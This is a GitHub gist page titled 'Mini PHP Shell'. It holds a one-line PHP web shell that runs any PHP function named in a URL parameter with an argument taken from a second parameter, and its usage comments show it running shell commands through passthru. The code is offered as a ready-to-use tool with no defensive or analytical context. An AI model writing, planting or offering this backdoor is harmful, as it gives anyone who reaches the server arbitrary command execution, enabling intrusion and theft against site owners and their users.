-
-
Save proclnas/4456b1b90de397fd14d74bb7e5be20f2 to your computer and use it in GitHub Desktop.
Mini PHP Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//(c) mastahyeti | |
//mini php shell | |
//usage: http://example.com?1=function_name&2=function_arguments | |
//example: http://example.com?1=passthru&2=ls | |
<? $_GET[1]($_GET[2]) ?> |
Author
proclnas
commented
Mar 6, 2017
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment